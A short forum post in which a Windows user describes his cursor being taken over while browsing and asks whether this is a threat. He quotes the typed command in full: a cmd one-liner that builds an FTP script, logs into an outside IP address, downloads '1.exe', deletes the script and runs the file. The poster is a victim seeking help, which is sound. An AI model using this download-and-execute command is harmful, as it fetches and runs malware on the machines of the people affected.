spooky windows script

Hello,

Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:

%systemroot%\system32\cmd.exe
cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

(I see on my network monitor that this is coming from outside; IP-number and user name vary.)

After that all is back to normal.

Now this is of course a nuisance, but is it also a thread? And what can be done against it?

Anybody got a clue on this?

Tia,

Jan Outhuis